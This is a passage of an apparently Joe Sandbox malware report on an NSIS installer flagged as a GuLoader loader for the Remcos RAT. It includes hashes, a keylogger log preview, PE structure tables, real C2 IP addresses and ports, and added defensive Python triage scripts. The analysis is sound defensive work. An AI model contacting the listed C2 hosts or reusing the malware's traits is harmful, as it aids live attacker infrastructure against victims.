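    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(section_names),
                       0, 0, 0, opt_size, characteristics)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, PE32_MAGIC)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + sections


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(is_dll=True)
    print(pe_triage(blob))
```

Run it with a path to get the same four facts the report tabulates for a dropped file; without arguments it triages the constructed fixture. Entropy is computed over the whole file, as the report does, so a small DLL with a large zero-padded overlay will read lower than its code section alone.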
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: .. (two bytes: a bare UTF-16LE byte-order mark, FF FE, with no content after it, which is why the file type is reported as UTF-16 text and the entropy is exactly 1.0)
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 424
Entropy (8bit): 3.435263143514028
Encrypted: false
SSDEEP: 12:KlrlzVmUecmlrlzVmIbWFe5ElrlzVYlrlzVqbWItN2LPL5l:+VqcSVxWqMVuVcWIt0Nl
MD5: BC56A0DA88A2F892D60BBD233BCD27DE
SHA1: 934CDA03DD8CCC543B8095BA6CFCDB49C4041D80
SHA-256: 20F61D90B5335E81C05DCD2D731AB8A41F612B9C061C5DCB65F5C02A04A7D82A
SHA-512: 3AD597A4D80AAA7CB288E0A26637139824A50F2AE856F8184ECF45957E765FF7E71B2A9138E2A10C4EA11E4470F7DE1BE4400A40E755B3BA18A54A3E5DF9FD93
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
Preview (raw): ....[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.5. .R.u.n.].........[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.9.7.1. .m.i.n.u.t.e.s. .}.....
Preview (decoded as UTF-16LE, NUL and CR/LF bytes dropped):
[2023/10/23 20:39:43 Offline Keylogger Started]
[2023/10/23 20:39:43 Program Manager]
[Win]r
[2023/10/23 20:39:45 Run]
[2023/10/23 20:39:46 Program Manager]
{ User has been idle for 70971 minutes }
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Entropy (8bit):7.916213399899471
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SMGS-RCDU5010031.exe
File size:2'729'832 bytes
MD5:b434372e36a7d17bc61c8062bbc14015
SHA1:1e28e9114efdf6bd2a9e0e96cd69b046abf94315
SHA256:b94541afbfc65ad19aa72f3c547c65c0e0e6e706c7cd18c31c80efe501d28346
SHA512:761fec13102a69ea6af89c4653a8954a2399b1db0d68149c90f1338e6c6e044f0e54562b8f898b598b8cee8ed9ff881eb8af169c3723f3e6c4608102b7fb4183
SSDEEP:49152:VM18QnXN81BUCV5VliUYmuyKLbokCQf8TlJoT9ESCPRGT8Ps+:Van9+B3r5YcsboCc29DKGYs+
TLSH:BFC5236AD244D0A3E65004345EE7DF319F269C549460469A27F8BE1F3DBE3137C2A2EE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
Icon Hash:0721587958601f07
Entrypoint:0x4032a0
Entrypoint Section:.text
Digitally signed:true (a security directory is present; this says nothing about whether the signature verifies, see Signature Valid below)
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC] (predates the signing certificate's Not Before of 14/01/2023 by almost seven years)
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
Signature Valid:false
Signature Issuer:E=Nedskrivningernes@Sammier.Bor, OU="Limiterede Lichenization Untitular ", O=Groundsel, L=Kingsteignton, S=England, C=GB (identical to the subject below, i.e. a self-signed certificate)
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487 (0x800B0109, CERT_E_UNTRUSTEDROOT)
Not Before:14/01/2023 07:13:48
Not After:13/01/2026 07:13:48
Subject Chain
• E=Nedskrivningernes@Sammier.Bor, OU="Limiterede Lichenization Untitular ", O=Groundsel, L=Kingsteignton, S=England, C=GB
Version:3
Thumbprint MD5:107DDDF05A7DD0B08EA7D7C920A6AB3B
Thumbprint SHA-1:2B0ABF4D3E3DB2DC277FE8267A0674C27EC69A97
Thumbprint SHA-256:09C7C39A757FDC8CB9D2AC9AA305BDC1B811874557CE9394D212118E9A78B832
Serial:22EF652A9C8D6EAD222E68906445FAFAFF2B65DB
Entrypoint disassembly (0x4032a0, .text):
  sub esp, 000002D4h
  push ebx
  push esi
  push edi
  push 00000020h
  pop edi
  xor ebx, ebx
  push 00008001h
  mov dword ptr [esp+14h], ebx
  mov dword ptr [esp+10h], 0040A2E0h
  mov dword ptr [esp+1Ch], ebx
  call dword ptr [004080B0h]
  call dword ptr [004080ACh]
  cmp ax, 00000006h
  je 00007FB8D45EF563h
  push ebx
  call 00007FB8D45F26A4h
  cmp eax, ebx
  je 00007FB8D45EF559h
  push 00000C00h
  call eax
  mov esi, 004082B8h
  push esi
  call 00007FB8D45F261Eh
  push esi
  call dword ptr [0040815Ch]
  lea esi, dword ptr [esi+eax+01h]
  cmp byte ptr [esi], 00000000h
  jne 00007FB8D45EF53Ch
  push ebp
  push 00000009h
  call 00007FB8D45F2676h
  push 00000007h
  call 00007FB8D45F266Fh
  mov dword ptr [00434EE4h], eax
  call dword ptr [0040803Ch]
  push ebx
  call dword ptr [004082A4h]
  mov dword ptr [00434F98h], eax
  push ebx
  lea eax, dword ptr [esp+34h]
  push 000002B4h
  push eax
  push ebx
  push 0042B208h
  call dword ptr [00408188h]
  push 0040A2C8h
  push 00433EE0h
  call 00007FB8D45F2258h
  call dword ptr [004080A8h]
  mov ebp, 0043F000h
  push eax
  push ebp
  call 00007FB8D45F2246h
  push ebx
  call dword ptr [00408174h]
  add word ptr [eax], 0000h
Note: every indirect call through [0040xxxxh] above reads a slot of the import address table (IAT at RVA 0x8000, size 0x2b4, i.e. 0x408000-0x4082b3 at image base 0x400000); the imported names behind those slots are not part of this excerpt. The trailing "add word ptr [eax], 0000h" is the disassembler running into padding after the function body.
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8610   | 0xa0    | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x57000  | 0x309a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x2984f0 | 0x2278  |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8000   | 0x2b4   | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0      | 0x0     |
Note: for IMAGE_DIRECTORY_ENTRY_SECURITY the "virtual address" is a raw file offset, not an RVA, which is why it maps to no section. 0x2984f0 + 0x2278 = 2'729'832, exactly the file size, so the Authenticode blob is the last 8'824 bytes of the file. The empty BASERELOC entry together with RELOCS_STRIPPED means the DYNAMIC_BASE flag cannot actually be honoured: the image has no relocations and always loads at 0x400000.
Sections (Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
.text  | 0x1000  | 0x637b  | 0x6400  | False | 0.671484375        | data  | 6.484796945043301  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000  | 0x14b0  | 0x1600  | False | 0.4401633522727273 | data  | 5.033673390997287  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xa000  | 0x2afd8 | 0x600   | False | 0.5188802083333334 | data  | 4.039551377217298  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x22000 | 0x0     | False | 0                  | empty | 0.0                | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x57000 | 0x309a8 | 0x30a00 | False | 0.4110298843187661 | data  | 4.7411066985802535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Note: .data reserves 0x2afd8 bytes virtually but carries only 0x600 on disk, and .ndata is entirely uninitialised (0x22000 bytes virtual, nothing on disk); .ndata is the section name NSIS installer stubs use for their runtime data. No section exceeds 6.5 bits of entropy, so the mapped image itself is not packed. The raw sizes sum to 0x38a00 (231'936 bytes) and the signature blob is 8'824 bytes, yet the file is 2'729'832 bytes: roughly 2.48 MB lies between the last section and the signature, in an overlay that no section (and none of the entropy figures above) covers.
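The header, directory, section and signature fields above are the inputs of a static triage, but the report only prints them. The following Python is an added example, written for this page (it is not Joe Sandbox's code and nothing in it comes from the sample), that reproduces the same checks with the standard library alone: it parses the PE32 headers, data directories and section table, computes per-section Shannon entropy and a zlib compression ratio (assumed here to be what the ZLIB Complexity column measures; the page does not define it), confirms that the security directory ends exactly at end of file, flags sections whose virtual size dwarfs their bytes on disk or whose entropy suggests packing, renders the link timestamp, and turns a signed error number such as -2146762487 into its HRESULT name. Because the real file is not on the page, build_minimal_pe() constructs a synthetic two-section PE (.text plus an empty .ndata, with a dummy blob appended as the signature); the synthetic bytes, the HRESULT table, and the 8x ratio and 7.0-bit thresholds are this example's assumptions.

```python
"""Stdlib-only PE32 triage mirroring the header, directory, section and
signature fields of the report.  Added example, not Joe Sandbox code; the
input PE is constructed below because the real sample is not on the page."""
import datetime
import math
import struct
import zlib

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # this entry holds a file offset, not an RVA

# Assumed lookup of WinVerifyTrust HRESULTs (the report prints them as signed decimals).
HRESULT_NAMES = {0x800B0109: "CERT_E_UNTRUSTEDROOT",  # chain ends in an untrusted root
                 0x800B0100: "TRUST_E_NOSIGNATURE"}


def hresult_name(err):
    """Signed 32-bit error number -> (unsigned HRESULT, symbolic name)."""
    code = err & 0xFFFFFFFF
    return code, HRESULT_NAMES.get(code, "unknown")


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    counts = [data.count(bytes([v])) for v in range(256)] if n else []
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data):
    """compressed/raw ratio; assumed to be what the report's ZLIB column measures."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def parse_pe32(buf):
    """Minimal PE32 reader: COFF header, optional header, directories, sections."""
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled here")
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    imagebase = struct.unpack_from("<I", buf, opt + 28)[0]
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", buf, opt + opt_size + 40 * i)
        raw = buf[rptr:rptr + rsize]  # bytes on disk; empty for uninitialised sections
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": rsize, "entropy": shannon_entropy(raw),
                         "zlib": zlib_complexity(raw)})
    return {"timestamp": stamp, "entry": entry, "imagebase": imagebase,
            "dirs": dirs, "sections": sections, "file_size": len(buf)}


def timestamp_utc(pe):
    """Link-time stamp rendered in UTC, as the report prints it."""
    ts = datetime.datetime.fromtimestamp(pe["timestamp"], tz=datetime.timezone.utc)
    return ts.strftime("%Y-%m-%d %H:%M:%S")


def signature_is_tail(pe):
    """True when the Authenticode blob ends exactly at EOF (nothing appended after signing)."""
    off, size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_SECURITY]
    return size > 0 and off + size == pe["file_size"]


def suspicious_sections(pe, ratio=8):
    """Sections whose virtual size dwarfs their on-disk bytes (space reserved for
    runtime-filled data) or whose entropy suggests packing.  Thresholds are assumptions."""
    return [s["name"] for s in pe["sections"]
            if s["vsize"] > ratio * max(s["raw_size"], 1) or s["entropy"] > 7.0]


def build_minimal_pe(text, signature_blob):
    """Constructed test input: PE32 with a .text section, an uninitialised .ndata
    section (as in the report) and a dummy blob appended as the security directory."""
    text = text.ljust(0x200, b"\0")[:0x200]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x57017AB6, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIII" + "HH" + "I" * 6,
                      0x10B, 6, 0,                                       # PE32, linker 6.0
                      0x200, 0, 0x22000, 0x1000, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      4, 0, 4, 0, 4, 0,                                  # OS/image/subsystem 4.0
                      0, 0x24000, 0x200, 0,                              # SizeOfImage, SizeOfHeaders
                      2, 0x8540,               # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (0x400, len(signature_blob))
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".ndata", 0x22000, 0x2000, 0, 0, 0, 0, 0, 0, 0xC0000080)
    headers = (dos + b"PE\0\0" + coff + opt + secs).ljust(0x200, b"\0")
    return headers + text + signature_blob


# Constructed sample: uniform .text bytes (entropy 8.0) and a 256-byte dummy signature.
SAMPLE_PE = build_minimal_pe(bytes(range(256)) * 2, bytes(range(256)))

if __name__ == "__main__":
    pe = parse_pe32(SAMPLE_PE)
    print("timestamp", timestamp_utc(pe), "entry", hex(pe["imagebase"] + pe["entry"]))
    for s in pe["sections"]:
        print(f"{s['name']:<6} va=0x{s['va']:x} vsize=0x{s['vsize']:x} raw=0x{s['raw_size']:x} "
              f"entropy={s['entropy']:.2f} zlib={s['zlib']:.2f}")
    print("signature is file tail:", signature_is_tail(pe), "flagged:", suspicious_sections(pe))
    print("error -2146762487 ->", hresult_name(-2146762487))
```

On a real file, pass open(path, "rb").read() to parse_pe32(). Run against the section table of this report, suspicious_sections() would flag .data (0x2afd8 virtual against 0x600 on disk) and .ndata (nothing on disk at all), which is where a practitioner looks next. signature_is_tail() only locates the Authenticode blob; whether the signature verifies is the job of the OS trust provider (WinVerifyTrust, or Get-AuthenticodeSignature in PowerShell), which for a self-signed certificate returns the untrusted-root error decoded by hresult_name().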
Resources (Name | RVA | Size | Type | Language | Country | ZLIB Complexity):
RT_BITMAP     | 0x57430 | 0x368   | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON       | 0x57798 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2446912338814622
RT_ICON       | 0x67fc0 | 0x94a8  | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3060752575152407
RT_ICON       | 0x71468 | 0x7d43  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9907381420151558
RT_ICON       | 0x791b0 | 0x5488  | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.32587800369685765
RT_ICON       | 0x7e638 | 0x4228  | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.31973311289560696
RT_ICON       | 0x82860 | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.38163900414937757
RT_ICON       | 0x84e08 | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41862101313320826
RT_ICON       | 0x85eb0 | 0x988   | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5073770491803279
RT_ICON       | 0x86838 | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5647163120567376
RT_DIALOG     | 0x86ca0 | 0x144   | data | English | United States | 0.5216049382716049
RT_DIALOG     | 0x86de8 | 0x13c   | data | English | United States | 0.5506329113924051
RT_DIALOG     | 0x86f28 | 0x100   | data | English | United States | 0.5234375
RT_DIALOG     | 0x87028 | 0x11c   | data | English | United States | 0.6056338028169014
RT_DIALOG     | 0x87148 | 0xc4    | data | English | United States | 0.5918367346938775
RT_DIALOG     | 0x87210 | 0x60    | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x87270 | 0x84    | data | English | United States | 0.7348484848484849
RT_VERSION    | 0x872f8 | 0x36c   | data | English | United States | 0.4954337899543379
RT_MANIFEST   | 0x87668 | 0x340   | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
Note: the ZLIB complexity of 0.99 for the 256 x 256 icon is expected, because PNG data is already deflate-compressed; the 0.23 to 0.56 values of the uncompressed DIB icons are normal for icon art. The resources are contiguous (each RVA plus size, rounded to 8 bytes, gives the next RVA) and the last one ends at 0x879a8, matching the .rsrc virtual size of 0x309a8 from 0x57000.
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not included)
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/23/23-20:39:41.494599 | TCP | 2855192 | ETPRO TROJAN GuLoader Encoded Binary Request M2 | 50036 | 80 | 192.168.11.20 | 77.238.121.250
10/23/23-20:39:45.144854 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 50037 | 2402 | 192.168.11.20 | 94.156.6.253
10/23/23-20:46:08.903547 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2402 | 50037 | 94.156.6.253 | 192.168.11.20
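The three IDS alerts above describe two distinct flows: an HTTP request to 77.238.121.250:80 that matches the GuLoader payload-download rule, and a Remcos 3.x check-in to 94.156.6.253:2402 that is later answered by the server on the same connection. The script below is an added example, not code from the Joe Sandbox report or from Joe Security: it takes the three alert rows as constructed input (copied from the table above), collapses the check-in and the server response onto one canonical flow per remote endpoint, flags the non-standard server port, and measures the gap between the loader's download request and the RAT's first check-in. The helper names (flow_key, c2_summary, stage_gap_seconds) and the assumption that the 192.168.0.0/16 side of each flow is the sandbox VM are mine.

```python
"""Correlate Snort alerts from a sandbox run into C2 flows and a timeline.

Added example, not code from the Joe Sandbox report. The alert rows are
copied from the report's IDS table; everything else is an assumption.
"""
from collections import defaultdict
from datetime import datetime

# Constructed input: the report's three alert rows as
# (timestamp, proto, sid, message, src_port, dst_port, src_ip, dst_ip).
ALERTS = [
    ("10/23/23-20:39:41.494599", "TCP", 2855192,
     "ETPRO TROJAN GuLoader Encoded Binary Request M2",
     50036, 80, "192.168.11.20", "77.238.121.250"),
    ("10/23/23-20:39:45.144854", "TCP", 2032776,
     "ET TROJAN Remcos 3.x Unencrypted Checkin",
     50037, 2402, "192.168.11.20", "94.156.6.253"),
    ("10/23/23-20:46:08.903547", "TCP", 2032777,
     "ET TROJAN Remcos 3.x Unencrypted Server Response",
     2402, 50037, "94.156.6.253", "192.168.11.20"),
]

# Assumption: the analysis VM lives in 192.168.0.0/16 (the report shows 192.168.11.20).
LOCAL_PREFIX = "192.168."


def parse_ts(s):
    """Joe Sandbox's Snort timestamp format, e.g. 10/23/23-20:39:41.494599."""
    return datetime.strptime(s, "%m/%d/%y-%H:%M:%S.%f")


def flow_key(sport, dport, src, dst):
    """Canonical (client, client_port, server, server_port) for either direction.

    The sandbox host is always treated as the client, so a check-in and the
    server's reply to it collapse onto the same key.
    """
    if src.startswith(LOCAL_PREFIX):
        return (src, sport, dst, dport)
    return (dst, dport, src, sport)


def group_by_flow(alerts):
    """Map each canonical flow to its alerts as (time, sid, msg, direction), sorted by time."""
    flows = defaultdict(list)
    for ts, _proto, sid, msg, sport, dport, src, dst in alerts:
        direction = "out" if src.startswith(LOCAL_PREFIX) else "in"
        flows[flow_key(sport, dport, src, dst)].append((parse_ts(ts), sid, msg, direction))
    return {k: sorted(v) for k, v in flows.items()}


def c2_summary(alerts):
    """One record per remote endpoint: rule SIDs, whether both directions fired,
    whether the server port is outside 80/443, and the time span covered."""
    records = []
    for (_client, _cport, server, server_port), hits in group_by_flow(alerts).items():
        records.append({
            "server": f"{server}:{server_port}",
            "sids": [sid for _, sid, _, _ in hits],
            "bidirectional": {d for _, _, _, d in hits} == {"out", "in"},
            "nonstandard_port": server_port not in (80, 443),
            "span_seconds": round((hits[-1][0] - hits[0][0]).total_seconds(), 3),
        })
    return records


def stage_gap_seconds(alerts, first_sid, second_sid):
    """Seconds from the first hit of one rule to the first hit of another,
    e.g. from the GuLoader payload request to the Remcos check-in."""
    first_seen = {}
    for ts, _proto, sid, *_rest in alerts:
        first_seen.setdefault(sid, parse_ts(ts))
    return round((first_seen[second_sid] - first_seen[first_sid]).total_seconds(), 3)


if __name__ == "__main__":
    for rec in c2_summary(ALERTS):
        print(rec)
    print("loader request -> RAT check-in:",
          stage_gap_seconds(ALERTS, 2855192, 2032776), "s")
```

On this report's data the Remcos flow comes out as bidirectional on port 2402 with roughly 384 seconds between the check-in and the first server response, and the loader-to-RAT gap is about 3.65 seconds; those are the numbers to carry into a beacon-interval hunt or a timeline for the incident write-up. Treating the RFC 1918 side as the client is a sandbox convenience; on a real network, use the connection's SYN direction instead.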
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2023 20:39:41.097842932 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.493037939 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.493316889 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.494599104 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.890543938 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890636921 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890691042 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890747070 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890763044 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.890801907 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890832901 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.890856981 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890919924 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.890973091 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.891006947 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891006947 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891028881 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
